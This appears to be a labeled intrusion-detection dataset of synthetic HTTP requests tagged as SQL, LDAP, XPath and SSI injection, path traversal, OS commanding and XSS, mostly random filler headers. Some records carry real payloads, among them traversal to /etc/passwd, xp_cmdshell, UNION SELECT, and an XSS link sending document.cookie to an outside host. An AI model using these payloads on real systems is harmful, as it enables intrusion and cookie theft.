GET /04zDEbylZM05hTHKE/ohtesntssc/Bmk-Hu-XZ4libdUY.nsf?hsh5=t%40v31OJZSsV8&efs8a=ruuL9BhR.&Keqy6d9naihotot=Gh%29h%2Fr%3ForAlink+Oradtrhttpe&dFXhy=acceptholesock_streamrd%2Bhuriobject++R&ooaunefq7xaaotU=3++or++++wtEdu%2FtRRv%2FBmnsl%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D163%5D+++++or+61766%3D&atbn4=%24mu HTTP/1.1
Host: www.ogol.de
Connection: keep-alive
Accept: application/x-tar, video/quicktime;q=0.7
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: ob=aletA
Client-ip: 22.250.1.169
Cookie: efreameasgswst=94;ianesZnalds=y8dbrAhmEHt;fa1gpyewd6Epav=ossddchoai;h6fr7os3eNaadth=iZmH5;c6i=3dna;sbd7maAhm='7
Cookie2: $Version="155"
Date: Wed, 29 Nov 06 22:44:44 GMT
ETag: W/"56EC8PbSAvpXcXhDN8as"
Expect: 100-continue
From: iovise@dAaalkEsu9.ch
If-Modified-Since: Sat, 25 Feb 06 17:37:24 GMT
If-Unmodified-Since: Thu, 24 Jan 08 09:38:17 GMT
If-Match: "NxCl9LIImvQvqp8k7Wo"
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 5.6
Pragma: ny='I4sjtss'
Proxy-Authorization: Digest username="tlens"
Authorization: t2cedb saurAea=crr2e
Range: -39415,-80233
Referer: http://atetn.it/aUroe/a1thN/1roth/polhs/oynyl.txt
TE: trailers,trailers
Trailer: Date
User-Agent: Mcrdree/4.5
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: HTTP/9.5 33.37.3.77, 1.2 213.206.105.161:57
Transfer-Encoding: compress
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 6.45.41.193
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49080
Start - Id: 36238
class: PathTransversal
GET /efXsu/aO/74Odtenyeh/nw/mqcy/elJ9nfwgeeo5o5wked/ejIvt5p7UKrNHlD-BDj/81OeQrruaek9/VHhjJ7/dO@43k.R.Pb.Gk/RQwxAU-tP/scnssEsceels.aspx? HTTP/1.0
Host: 144.51.133.50
Connection: sShsrOs
Accept: text/*, application/rtf;q=0.4, audio/*;q=0.3
Accept-Charset: windows-1252;q=0.3, shift_jis;q=0.4, koi8-r;q=0.3, x-mac-turkish;q=0.6, iso-8859-2
Accept-Encoding: *;q=0.3
Accept-Language: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
Cache-Control: max-stale
Client-ip: 238.212.43.2
Cookie: StiOnMrstWlja=dpaeXA;GVhomeg=hkmtF;oeebhroekaS=wfwhererrr21Ree;i;5Thi=trttiateits;ssnosash=07676768
Cookie2: $Version="74"
Date: Thu, 04 Dec 08 10:48:31 GMT
ETag: W/"5_tSMbho.kuGbwC9G"
From: m2sjud@ksr7jeno.com
If-Modified-Since: Fri, 13 Oct 06 07:22:30 UTC
If-Unmodified-Since: Mon, 08 Jun 09 08:23:13 GMT
If-Match: "-7ViJnuOfgncmQSz"
If-None-Match: *
If-Range: "5vgZASDIyFqkfbLBGt"
Max-Forwards: 93
Pragma: no-cache
Authorization: btBg udfn=hcmmt
Referer: http://www.1peafef.be/bciiHrT/rjeeeutb/anse9mo5/ifmmie.ace
User-Agent: Mozilla/4.8 (Windows; U; Win98 4.3; ef-rS; rv:6.2.8) Gecko/89241812
Via: 5.8 www.iErjere.png
Transfer-Encoding: eleg; Ssdctnea=qqkiA
Warning: 936 www.oddai.htm "ticEeoflnmcen" 

null

End - Id: 36238
Start - Id: 42546
class: SqlInjection
GET /boot.inioWlibY/wtMelituU/VOzt@VKv1L/3pht2ohmgrasaaajIni/aS68gtee/okLheI47V/egZvoeVIV/esDh1naHo/jX0sO@wATXOyphp0/YqUrA.HtAfRU/ascebjt.msf?qcjD.EselectzW=33&yoHHlinkkK=fo&Sahu=0056031&rznoN=ad3eDHfrts&Va3=+%5DaN&tlnnnhemte1Ev=OrigText%27OR%27ophat%27++++%3D++++%27eln%27&Qzs5=sLjwW&dsoedn=eLEm&oseAeoNeu=eBnjUhNiFwA&lCYnBbkjJ=Ma0rrdeglshsIo&LwjA7teZ=979322 HTTP/1.0
Host: 24.252.124.22
Connection: close
Accept: */*;q=0.1
Accept-Charset: iso-8859-5, x-mac-chinesesimp, iso-8859-15, cp-936, koi8;q=0.3
Accept-Encoding: identity;q=0.2
Accept-Language: *
Cache-Control: max-age=46
Client-ip: 15.200.32.132
Cookie: BAbotorI=sQ0-c2aI8;lasakteprgsws=tgfprocessing-instruction4nwhtsi9fj;ywzexh1ot5oo7=34
Cookie2: $Version="14"
Date: Mon, 24 Dec 07 17:05:42 UTC
ETag: W/"gEAy5nWg0ykG4kp-"
Expect: oc967Rm
From: bs1as@pton6i0pc.org
If-Modified-Since: Sat, 12 Dec 09 07:49:49 GMT
If-Unmodified-Since: Sun, 10 Feb 08 24:23:11 GMT
If-Match: "YCHfNxaPI4v6f5y"
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 4928
MIME-Version: 3.7
Pragma: Homn='v'
Proxy-Authorization: NTLM ZW9hbnRtYnlsRXN0c3BBYXR5ZzhTczhhM29Fb3NvcGQ=
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: 6-84675,628-,982-49
Referer: /9Ysetoh/thxo.jsp
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: Mozilla/6.4 (Machintosh; U; Mac OS X 7.3; ss-uw; rv:2.0.5) Gecko/56823727
UA-CPU: x86
UA-Disp: 962,664,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8264x986
Via: 7.7 www.salfoeT.png, 0.2 www.1lrhr.css, HTTP/4.2 87.92.174.85:17978
Transfer-Encoding: compress
Upgrade: aehy/9.2, etyl/6.6
Warning: 563 www.aePi5.gif "edicbUoeitewfnmtlui" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 1876106760
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42546
Start - Id: 41835
class: SqlInjection
GET /7uo/deli1MMSq/ng5ui4du1u/ofnjB/dc@2uH1SR3/teYBPykP54Eg3/Blwh/CyB1@pevalWhLr/oZrmtele7nsi3qbnsaeh/hfGbbku5HTA43vr.shtml?eo9i7nauyngrl=89826277&oitdts=jYghsxuwlWi&eaeTr=rtteeRe&5A7tZdNUTUP=kVwdc&etqnf=%27%3B++begin+++++declare+++%40ret++varchar%288000%29++++set+%40ret%3D%27%3A%27+++++select+%40ret%3D%40ret%2B%27+%27%2Ba8%2B%27%2F%27%2Bpassword+from++++res+++where+++++ntdgh%3E%40ret+++select+++%40ret+as+++ret++into+++foo++++end--&zou=20&tafehnyumtau3v=Ric&aAato=4aOdia4epm9emat&iTueT=F%5C&5jhZjtc=3t0h&nk=noss&dctlbd7dha8e3g=035256209 HTTP/1.1
Host: 138.15.198.6
Connection: keep-alive
Accept: */*;q=0.7
Accept-Charset: windows-1258;q=0.9
Accept-Encoding: *
Accept-Language: eldTtod-h6mhbBe;q=0.0, wxqma7ii-hXflPc;q=0.7, tee3M-7q;q=0.6, rowrTn1s-recoTn;q=0.6, Aoetg-aosnrrlr;q=0.8
Cache-Control: only-if-cached
Client-ip: 196.90.56.27
Cookie: Ntcptl=391427;n@QCVg.passthru9vinputv=gaR;ws4sepnoem5aLS=5792;1l=ar;Rrloil=acn 8o kE3seS;rtwtaIO=a5si
Cookie2: $Version="58"
Date: Tue, 05 Aug 08 18:58:09 CET
ETag: W/"sEO6-Hh4WcNew12P"
Expect: 3hnAo
From: wIdO@lerc.gov
If-Modified-Since: Mon, 07 Mar 05 04:57:19 UTC
If-Unmodified-Since: Sun, 14 Mar 10 16:37:45 UTC
If-Match: "uksNWcbA@zsg4cd"
If-None-Match: "a9kd1k72KCg5uAD"
If-Range: "yPkp7d0f8_yExhrUxI"
Max-Forwards: 40
MIME-Version: 5.5
Pragma: istgut='utsar'
Proxy-Authorization: NTLM ZDhzdGFlcmRSaGlvNXR5aW9tMHFkU3JpY2VpaXV5ZW56Y2Rsbw==
Authorization: NTLM dDBtTDh5Z2hyQmFibWlzZWxzYmF0T3lkYXhweW5yb2k0Yg==
Range: -0842
Referer: /obst/hr11.mdb
TE: trailers
Trailer: Max-Forwards
User-Agent: temLz87glF
UA-CPU: StrongARM
UA-Disp: 0572,127,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 5914x483
Via: 2.7 www.n1sih.jpeg:44, 6.6 15.133.130.11
Transfer-Encoding: deflate
Upgrade: 7r8/5.9, eevr/0.1, escfA/5.5, itqIta/3.3
Warning: 186 127.58.150.59 "ns2cjsi" "Mon, 05 May 08 16:07:50 GMT"
X-Forwarded-For: 80.139.161.110
X-Serial-Number: 431124702375
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41835
Start - Id: 49058
class: XPathInjection
GET /dwNdjM6TV3XsFuXlXb@/r5cpydlcouio2uconhhs/oV/8n2jKJ1UUuqfqUue/@lo/UoIema2h/8SfD5Xo._EJs/shIltheljit/e-includeliusrsI/el9C.dll?nrdzaiaa=tgbsRnierlaeetny&ehi=plla5b6eshnn8&bssstCo=us&neoe5oL2ecrRu=blogticSpe&Year8tqreo=q0atstr&XDhNgC0xtermI=rhnow%2Fersies%2Fvt%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D2%5D++%7C+++++ssro%2Fp7o5%2Frsl%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D207%5D+++or++%27go%27+++%3D++%27&srltoeti=shutdownwk%28+m&mtetahEt=iScaiipmoHr&R3aR=oeCJ8jbdG2p&ythtkdhtstm0=efhhW+%2Btmp&nbdttfrwhs4ie1=pa5orlregx2d84l&zys5o4h=rkt4ltschWpefv1e HTTP/1.0
Host: 66.170.46.12
Connection: close
Accept: text/html;q=0.6
Accept-Charset: x-mac-hebrew;q=0.4, x-mac-japanese;q=0.1, macintosh;q=0.4, hz-gb-2312;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 171.68.148.111
Cookie: Uem=egtNhivrq:homeJ;oDdbeso=94;tteecZt=5012;Ss0asgesuC=nk
Cookie2: $Version="41"
Date: Sat, 27 Aug 05 14:03:01 UTC
ETag: W/"YX5bzwZtwNQk4-0no3z"
Expect: 8nnlas=imrht
From: oT4sie@pMej.gov
If-Modified-Since: Mon, 09 May 05 22:21:06 UTC
If-Unmodified-Since: Thu, 24 Jun 04 09:01:07 GMT
If-Match: "VVXLeIO6GfdYYH@jIAKu"
If-None-Match: "uVnhMDttG13KSeiz"
If-Range: *
Max-Forwards: 4190
MIME-Version: 6.2
Pragma: jeeifosh='ocTnSer0'
Proxy-Authorization: Digest qop=auth
Authorization: NTLM bml2ZWVvaWd5ZXRycDllckNqZXJoNWFFR3NjdG1waGxld21zbW9uZThib3dlbA==
Range: 39-3,285934-049996,9533-33623
Referer: /fikb/oant/uskltp.nsf
TE: trailers,trailers
Trailer: User-Agent
User-Agent: lrutaawn/8.6
UA-CPU: x86
UA-Disp: 357,241,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 7313x7197
Via: HTTP/5.8 www.srpoanr.css, FTP/9.7 174.224.157.210:69912, 5.6 www.ash3ta.html
Transfer-Encoding: gzip
Upgrade: BzRA/3.7, eSa/6.4, DCeds/5.7
Warning: 712 141.86.56.222 "RenNkwhed" "Fri, 05 Oct 07 19:54:02 GMT"
X-Forwarded-For: 161.22.54.66
X-Serial-Number: 00114
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49058
Start - Id: 40650
class: SSI
GET /deDeeaadcIoohmumgnh/erlrdNsrazijpb4fmk/toilxpSl6cRiabljpd/U.@H3@Y%uhcB/Ossr/avWEKzSAck%u/passthru8nrN10dkywgetnLdYW/jeoarO.php?oQthzictwz=452773&sBgusrYKJp=Weg%29+mservicesat7lrl%3Bphptb&hzrN6antbtw=ecgjz9&azsm1hd=rdhavingm&kitsblvomtnqree=%3C%21--++%23include+virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++--%3E&ro9oocg1b6ic=osexechwau9o&hoo=pboot.inimocha%3Fh&mmiolgh=5&ep=0885&ecaa=Bwnec&watt1pk=83444621&WDJsFBpAA=re+ HTTP/1.0
Host: 166.67.114.55
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1254, iso-8859-7;q=0.5, iso-8859-15
Accept-Encoding: deflate, deflate;q=0.7, compress, identity;q=0.8
Accept-Language: *
Cache-Control: oc5='c'
Client-ip: 26.207.222.161
Cookie: 0Reeynt=sa\;nalmm=65082
Cookie2: $Version="2"
Date: Tue, 02 Sep 08 24:56:59 GMT
ETag: W/"y3IrHtmRU.P0tK2"
Expect: 100-continue
From: Doem@euee.uk
If-Modified-Since: Tue, 09 Oct 07 08:00:02 CET
If-Unmodified-Since: Sun, 29 Apr 07 04:09:26 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 15 Oct 09 16:58:29 UTC
Max-Forwards: 331
MIME-Version: 0.6
Pragma: bome=mwge
Proxy-Authorization: sfoht tsob=EeAAttxn
Authorization: Digest uri=/jsgnsbra/trrlhrUr/hhEl9naq/hoc9r/fiuxeen.asmx
Range: 176-,5948-8668,8671-305
Referer: http://drxBrp.net/i70iitis/E9tmw/dnsVru/gettyina.jpeg
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.0 (compatible; Konqueror/4.9; Open BSD i586; eknrsd; iieoc2w; eadDuOsdt)
UA-CPU: PowerPC
UA-Disp: 959,926,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 951x487
Via: 3.7 www.lht4awi.tiff, HTTP/1.0 www.nggsd.htm:86105
Transfer-Encoding: identity
Upgrade: ee5/5.0, jepe/3.9, rwstdt/7.6
Warning: 381 www.ehdcewa.js "Od6ygEdahSe9" 
X-Forwarded-For: 197.32.78.234
X-Serial-Number: 552421
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40650
Start - Id: 38681
class: LdapInjection
GET /eoujoeaf/tMYS-3OJ1IiPwMZ4YR8h/it/2i/nqlibdtGsnnPywwo/0r/1tnaSae1awii/Noldghl5IazO.cfm?1eivrrPnt3isy=70371&bInystisrtiaph=oUz&cNqmwnrmsmieyd=58&7houbg7s=lAKZ5RyM1U&at=shf6&tti=++objectcrNentNei%5ChtpassqbgsoundEnhf&eG2htgms=GyeJ&V._r.uM_GNdocument=Lecho%25aia0&o3CNtYsncGugX=%5Di%3Am%3F&uv2raoxarHg=%29+%28++++%7C++++%28displayName%3Dhad*%29+++%28name++%3D+++had*%29%28+mail%3Dhad*+++%29 HTTP/1.1
Host: 187.73.116.92
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: u-ao
Cache-Control: n3='re'
Client-ip: 194.227.156.180
Cookie: biehc=671;5KGtHQ=t6mua;nap=innta
Cookie2: $Version="32"
Date: Thu, 23 Jul 09 11:49:59 GMT
ETag: "EvxKQQHQRlpZyyner"
Expect: Nh7w=4aegcen;feoka
From: dfkm@ocxe8.ch
If-Modified-Since: Sun, 05 Oct 08 02:42:24 CET
If-Unmodified-Since: Mon, 26 Apr 10 13:20:51 CET
If-Match: *
If-None-Match: "35o5wSZ8DNsm4.BVOG"
If-Range: *
Max-Forwards: 8
MIME-Version: 5.2
Pragma: rehfi5='bn'
Proxy-Authorization: NTLM NW9uckk4bWZtaXRyMGFvemFoaXJZZWNoZW5jaWV5Zmxpc2EzYXNOZWVzNXM=
Authorization: Basic YXNvdDpiZWhiNXRpZA==
Range: 39622-,-9614,-81153
Referer: http://eithn5n.ch/fesii/siuxao/oImAs.exe
TE: trailers
Trailer: Warning
User-Agent: gnTeen3/2.4.4.1
UA-Disp: 0550,3953,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 6318x7597
Via: 6.3 58.231.90.251:38, 6.1 84.0.90.187
Transfer-Encoding: compress
Upgrade: anRsj/9.4, 58agtG/6.3
Warning: 662 www.deregsns.gif:97 "htvam7uh0EcerdZsfa" 
X-Forwarded-For: 154.58.221.162
X-Serial-Number: 7677444389981478018
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38681
Start - Id: 35071
class: SqlInjection
POST /vTZ@/tnGs/necntteiiu4/tgrnpRhEL2bOz/tcoSakzdiruRa6gq2e/eghtme/dceltc/drx2Cnp.dll? HTTP/1.1
Content-Length: 11
Content-Language: 0MstlseA,idosog1
Content-Encoding: compress
Content-Location: /tEeaeO/1thG/jrhfo/aTEa.jsp
Content-MD5: OXptb2l1cmVlbjJsU3NNNA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 06 Jul 07 03:06:44 GMT
Last-Modified: Sat, 13 Aug 05 22:54:44 GMT
Host: 169.44.240.171:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: gzip;q=0.1
Accept-Language: *
Client-ip: 8.69.94.169
Date: Wed, 24 Oct 07 12:15:58 GMT
Expect: haokpp=elmah;rytfe=itpi
If-Modified-Since: Wed, 14 Mar 07 11:39:02 CET
If-Range: Sun, 30 Nov 08 15:36:04 CET
Pragma: niyj8=rn
Referer: http://difyo.fr/IfettlN/g2Ereed.php3
User-Agent: ';EXEC    master.dbo.xp_cmdshell 'cmd.exe

Re58tfXti=4

End - Id: 35071
Start - Id: 36545
class: OsCommanding
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: 95.72.87.219
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=97
Client-ip: 213.233.54.110
Cookie: s2nbtiu6lee=n;1s91edlca9=7159233312;NqyCp=ed\irdivyai;zNteaien=ru
Cookie2: $Version="51"
Date: Sat, 01 May 10 01:25:03 CET
ETag: "qAEfzWG5X7Zdf0i"
Expect: e6be
From: h8IMoanr@hlhircha.ch
If-Modified-Since: Tue, 13 Apr 10 10:59:01 UTC
If-Unmodified-Since: Fri, 12 May 06 09:44:28 UTC
If-Match: *
If-None-Match: "mjNwGbHAxe-3M0DGNWp3"
If-Range: "CAXSyzgpnM7i0TN.51g"
Max-Forwards: 2
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest nc=Ad95328B
Authorization: 2Sa3e 7aaa=sttdaoE
Range: 9206-,968-
Referer: /nusefel/ael7vstt.wav
TE: trailers,trailers,trailers
Trailer: Max-Forwards
User-Agent: ae9slL http://www.fltrt.cz
UA-CPU: x86
UA-Disp: 1693,583,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 547x5195
Via: UEttL/5.3 126.235.176.241
Transfer-Encoding: deflate
Upgrade: ildtt/8.0
Warning: 826 69.77.188.222 "hEdhtjuthB0Ezshecem" 
X-Forwarded-For: 103.73.131.132
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36545
Start - Id: 45028
class: PathTransversal
POST /ey5osdaftettShN/i3ej1iRsl/HyBm/c1bnr4hqj-h/5j0Nvn.rBGoT/QAee5.tiff? HTTP/1.1
Content-Length: 212
Content-Language: ddadirb,mttxi0
Content-Encoding: deflate
Content-Location: /soGb/edkae7rx/riaimObi/e9Ur/oO5l0r.swf
Content-Type: application/x-www-form-urlencoded
Last-Modified: Sat, 12 Jan 08 16:03:18 CET
Host: www.tlpp.be:80
Connection: close
Accept: application/zip;q=0.7, image/png;q=0.1, image/*;q=0.0
Accept-Encoding: deflate, deflate, deflate;q=0.5
Date: Tue, 14 Mar 06 08:57:34 UTC
Expect: 100-continue
If-Match: *
Referer: /F0enet0A/Hrhci4.exe
TE: chunked,chunked;q=0.8,trailers
User-Agent: /./../../.././../.././../.././../../../
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~

e2shutdownxyJulQ=a+havingperlsdy6va@a&tnutn6=R<t M7pfsf1m5sock_streamh&mdlpFaeecnooe=- 9qut0ttmpid&oegtelrj=|vs&evaleQYLSSHDm=etkt&1NsopenbinJ3xgRHv=o+hd$ lg&-2jKRn0rer=000&Mhsa3iqa=(iLeheb6  evgora

End - Id: 45028
Start - Id: 35400
class: SqlInjection
GET /D4NVtU/se1pT8.swf?sv0biag=6223&ptbnxl=xeeiesock_streamtiad9ursem&ow3hrbte=oeiframehy&nednoih=OR++++%27toIekciuw%27+++%3D+N%27+%27&tadu=%3Ansamsamae%24 HTTP/1.1
Host: 55.59.196.250
Connection: y1aetggt
Accept: application/zip
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 6eo-soe, i-a;q=0.7, d-s1ist, Ntum-xourn, mzt-anheoe;q=0.4
Cache-Control: stTr1i='C'
Client-ip: 27.88.177.131
Cookie: iOtersyone4=eOesFgpt4v6sl
Cookie2: $Version="091"
Date: Sun, 27 Aug 06 08:18:14 UTC
ETag: "w.bssa@znOLYSv9"
Expect: aeuor=cxtirylr
From: attRtlnt@3bmi3fqyko.fr
If-Modified-Since: Sat, 04 Mar 06 08:57:18 UTC
If-Unmodified-Since: Sun, 26 Nov 06 02:54:13 GMT
If-Match: *
If-None-Match: "xRi8ZP-96e1q4YBs8jZ"
If-Range: *
Max-Forwards: 766
MIME-Version: 3.4
Pragma: o='qer'
Proxy-Authorization: Basic ZTQwbmk6bmI2cmlyNQ==
Authorization: Basic aUEzb3BhcjpUZWN0M2U=
Range: -67
Referer: http://www.td3Toe.cz/Ectnq.wav
TE: trailers,trailers
Trailer: Proxy-Authorization
User-Agent: els0onsas/4.5
UA-CPU: Sparc
UA-Disp: 962,2383,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9837x1680
Via: FTP/9.1 162.125.228.80, 1.3 88.165.139.162:866, FTP/0.8 71.238.155.236
Transfer-Encoding: compress
Upgrade: to9t/2.8, 4Egiin/1.2, doaAoo/6.7, Tuann/2.6
Warning: 626 www.oshnoh.js "antet8eadasscGdetdy4" "Tue, 26 Sep 06 16:40:30 UTC"
X-Forwarded-For: 11.131.105.136
X-Serial-Number: 840148
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35400
Start - Id: 41719
class: SqlInjection
GET /aGb/9RCU0zechoIuh6BXX/RGZPWboot.iniqmEVs6N/oysajeieot8cnu/dRqFBLe@GvOUG9/WexecEQcMSDe7YXF/heCio7Ouynhft/EGnVqkH@d4Y5@z/oOSWLqGZm/ooHH47.png?apois4feltscnt8=arimny&Rp=hnaSewcitaedrt&mmsarmnont=%3F&jlst7de=%27++++union+++++select++%40%40version%2C1%2C1%2C1-- HTTP/1.0
Host: www.e2hnse.it:4
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=29
Client-ip: 60.67.60.69
Cookie: StonatoiU=8160980;tlim=ecmdtes7;oEo4l0=ht;mwn=153531671;eoiaL8ca=ad95mQLzeDnF
Cookie2: $Version="483"
Date: Mon, 12 Oct 09 21:15:23 GMT
ETag: W/"Skmf9ETPm2sCSTzQ"
Expect: 100-continue
From: daatsa@4adiaM.fr
If-Modified-Since: Fri, 04 Sep 09 21:14:28 GMT
If-Unmodified-Since: Mon, 15 May 06 09:13:07 UTC
If-Match: *
If-None-Match: "GXrGnNJe9dDO4fka"
If-Range: *
Max-Forwards: 3
MIME-Version: 9.0
Pragma: en=3
Proxy-Authorization: Basic ZWV0bnRuOnZsY2k3Z3Q=
Authorization: gtytt hyuNti=0iath
Range: 018268-
Referer: http://eIinte.ch/r0u7ie/riosipir.html
TE: trailers,chunked;q=0.8
Trailer: Via
User-Agent: Mozilla/9.0 (Windows; U; WinNT 4.0; iy-cn; rv:9.5.9) Gecko/25716468
UA-CPU: Sparc
UA-Disp: 1862,8220,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 431x0868
Via: FTP/1.4 57.123.195.248
Transfer-Encoding: identity
Upgrade: aah/4.0
Warning: 604 www.Tomsiqie.jpeg "nobubdd9hsyeftiJigo" 
X-Forwarded-For: 152.105.208.9
X-Serial-Number: 611965021882313
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41719
Start - Id: 45119
class: PathTransversal
GET /.nsf/../winnt/system.ini? HTTP/1.0
Host: 195.190.88.4:32036
Connection: close
Accept: text/*;q=0.1, image/*;q=0.7
Accept-Charset: *
Accept-Encoding: deflate;q=0.4, deflate;q=0.1, gzip;q=0.6
Accept-Language: *
Cache-Control: no-transform
Client-ip: 189.198.0.35
Cookie: ndeinet8izPIk=lrnM1;fni=0759297;PXxmlKl0r=cTS&es :++Atscriptnnwto 7;ot7ineN=4CPsb3y2
Cookie2: $Version="35"
Date: Fri, 25 Apr 08 07:52:51 UTC
ETag: W/"M6@cazmkokCWUTxYz"
Expect: uhxrdEf=ynXs4rl3
From: lmfapce@abHed.be
If-Modified-Since: Fri, 30 Dec 05 12:13:28 GMT
If-Unmodified-Since: Fri, 01 Feb 08 09:08:32 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 20 Jun 04 04:28:51 GMT
Max-Forwards: 5343
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: NTLM Ym50bGxsNGUxczRoMGhjdXFzeGlsb0xPNHJzaHppVDJmaWVlZW5u
Authorization: Rnue 3unc=tstl
Range: -3,456-488022
Referer: http://www.xafhem.uk/8aassGbo.jpg
TE: gzip,chunked;q=0.0
Trailer: Host
User-Agent: po4kidtLGa (mwMTdlj)
UA-CPU: StrongARM
UA-Disp: 5047,8443,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 0464x327
Via: lbc/5.9 43.64.193.222, HTTP/0.9 133.29.83.73:6
Transfer-Encoding: gzip
Upgrade: tist/2.4, eyl/9.6
Warning: 335 www.pAcueaen.jpg "dsav8ecoO" 
X-Forwarded-For: 101.164.70.181
X-Serial-Number: 3741240593504860
----: ---------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 45119
Start - Id: 46839
class: XSS
POST /pi.qA/wj/2Bz75osFE7wG0lVcC_5/xhste2Nmttsnbnnta/hyenasxdacllre/MQRh/sazni/ijrseh1eklnoe/CHoAY3RGcqWMA/mGh3wD3@a-USHhmMz7m/xshutdownOSAX3ADaFmP.cfm? HTTP/1.1
Content-Length: 295
Content-Language: dedtti5,utsifn
Content-Encoding: identity
Content-Location: http://www.arwtAvra.org/ed9x/h0de2n/c9gew/rtl6.cgi
Content-MD5: dGRmdGNrc3RsYXRpbHJ0YQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 06 Jan 07 10:57:53 GMT
Last-Modified: Wed, 04 Jun 08 06:01:50 CET
Host: www.ee1e8n.it
Connection: r9inlsp
Accept: */*;q=0.5
Accept-Charset: euc-kr, x-mac-ce, iso-8859-8-i
Accept-Encoding: 
Accept-Language: 3g0m9-cug;q=0.1
Cache-Control: no-transform
Client-ip: 220.1.146.36
Cookie: csrtl5r=n7jchildh;dgtfeecvaiid=81677145
Cookie2: $Version="944"
Date: Mon, 12 Jul 04 03:25:55 UTC
ETag: "4y65XizpsvxblzyDhxg"
Expect: 100-continue
From: fassgdh4@tikal0.com
If-Modified-Since: Thu, 24 Jul 08 02:29:06 GMT
If-Unmodified-Since: Mon, 05 May 08 20:40:51 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 13 Jan 10 17:14:26 CET
Max-Forwards: 0012
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: NTLM Y2xlb0RhYWloY2Vsbm50dG5oZW94ZWV0MHNveWllTW84bm5pajhmcjdyb3Q5
Authorization: Basic ZGdyZ3ZmcTpzZ2x0bQ==
Range: 04-141477,-19
Referer: /hssnzz/qlnrTmt.txt
TE: trailers,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/2.7 (Machintosh; U; PPC Mac OS X 1.0; 8s-he; rv:7.3.1) Gecko/87231070
UA-CPU: Sparc
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 818x5674
Via: HTTP/2.4 135.210.142.135:82, FTP/6.2 255.173.206.114, FTP/5.6 www.ardelohn.tiff
Transfer-Encoding: compress
Upgrade: ccSen/7.1
Warning: 515 www.wruorr.jpg "seuttb" 
X-Forwarded-For: 67.114.213.31
X-Serial-Number: 072274181665
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ntlunlv7cwNc=rxterm]n&nSaae=dopensvt&ced4dadl07to=<link     rel=   "     stylesheet"     href   =  "javascript:  [document.location.replace ('http://www.veneliat.com/cgi-bin/tetise.cgi'+document.cookie);]     "  >&noh8oiwapi=5821134331&g8nb=40174481

End - Id: 46839
Start - Id: 45593
class: PathTransversal
